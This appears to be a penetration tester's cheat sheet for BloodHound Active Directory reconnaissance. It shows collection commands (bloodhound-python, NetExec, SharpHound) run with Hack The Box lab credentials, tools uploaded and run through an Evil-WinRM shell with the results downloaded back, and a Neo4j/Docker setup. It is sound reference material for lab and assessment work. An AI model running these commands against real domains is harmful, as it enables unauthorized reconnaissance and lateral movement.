BloodHound
Ingestor
Remote
bloodhound-python
bloodhound-python -u svc-alfresco -p s3rvice -ns 192.168.1.2 -d htb.local -c All --zip
# proxy / tunnel / pivoting / proxychains
proxychains -q bloodhound-python -u svc-alfresco -p s3rvice -ns 192.168.1.2 -d htb.local -c All --dns-tcp --zip
NetExec
rm ~/.nxc/logs/*
netexec ldap 192.168.1.2 -u 'svc-alfresco' -p 's3rvice' --bloodhound --collection All
netexec ldap 192.168.1.2 -u 'svc-alfresco' -p 's3rvice' --bloodhound --collection All --dns-server 192.168.1.2
mv ~/.nxc/logs/*.zip .
Local
SharpHound.exe
https://github.com/SpecterOps/SharpHound/releases/tag/v1.1.1
*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop\Privesc> upload SharpHound.exe
*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop\Privesc> .\SharpHound.exe -c All
*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop\Privesc> dir
Directory: C:\Users\svc_loanmgr\Desktop\Privesc
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/26/2022 7:44 AM 11633 20220926074434_BloodHound.zip
-a---- 9/26/2022 7:42 AM 1051648 SharpHound.exe
-a---- 9/26/2022 7:44 AM 8601 ZDFkMDEyYjYtMmE1ZS00YmY3LTk0OWItYTM2OWVmMjc5NDVk.bin
*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop\Privesc> download 20220926074434_BloodHound.zip
SharpHound.ps1
https://github.com/SpecterOps/SharpHound/releases/tag/v1.1.1
*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop> upload SharpHound.ps1
*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop> Import-Module .\SharpHound.ps1
*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop> Invoke-BloodHound -CollectionMethod All
*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop> dir
Directory: C:\Users\svc_loanmgr\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/25/2022 5:41 PM 9112 20220925174131_BloodHound.zip
-a---- 9/25/2022 5:40 PM 973325 SharpHound.ps1
-a---- 9/25/2022 5:41 PM 11122 ZDFkMDEyYjYtMmE1ZS00YmY3LTk0OWItYTM2OWVmMjc5NDVk.bin
*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop> download 20220925174131_BloodHound.zip
Analisis
Neo4j
# apt install -y neo4j
neo4j console
BloodHound
# apt install -y bloodhound
bloodhound
Docker
https://0ut3r.space/2024/04/22/bloodhound-ce-and-docker/
# dependencies
apt install -y docker-compose docker.io
# download docker.compose file
cd /dev/shm
wget https://raw.githubusercontent.com/SpecterOps/bloodhound/main/examples/docker-compose/docker-compose.yml
# run
root@kali:/dev/shm ❯ docker-compose up -d
# get tmp password
root@kali:/dev/shm ❯ docker-compose logs
# example output (tmp password):
bloodhound-1 | {"time":"2025-10-10T13:32:37.710337927Z","level":"INFO","message":"###################################################################"}
bloodhound-1 | {"time":"2025-10-10T13:32:37.710361799Z","level":"INFO","message":"# #"}
bloodhound-1 | {"time":"2025-10-10T13:32:37.710365328Z","level":"INFO","message":"# Initial Password Set To: NGRZOGWZ1RtaKyzx5S3mJqSnjxrFrPf7 #"}
bloodhound-1 | {"time":"2025-10-10T13:32:37.710367993Z","level":"INFO","message":"# #"}
bloodhound-1 | {"time":"2025-10-10T13:32:37.710370407Z","level":"INFO","message":"###################################################################"}
# change tmp password
admin:NGRZOGWZ1RtaKyzx5S3mJqSnjxrFrPf7
# password
admin:P@ssword12345
# stop & delete
root@kali:/dev/shm ❯ docker-compose down ; systemctl stop docker ; systemctl stop containerd